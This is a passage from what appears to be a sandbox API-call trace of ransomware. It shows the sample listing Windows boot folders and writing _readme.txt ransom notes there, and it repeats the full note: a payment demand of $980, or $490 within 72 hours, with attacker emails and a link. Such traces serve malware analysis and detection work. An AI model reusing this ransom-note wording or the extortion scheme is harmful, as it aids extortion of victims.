free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.034] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.034] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.035] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.035] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.036] CloseHandle (hObject=0x5c8) returned 1 [0094.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.037] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.037] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.037] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.037] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19639e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.038] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19639e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.038] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.038] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.046] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0094.046] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.046] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.046] PathFindFileNameW (pszPath="") returned="" [0094.047] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.048] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.048] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.048] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.048] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0094.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.048] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0094.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.050] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like 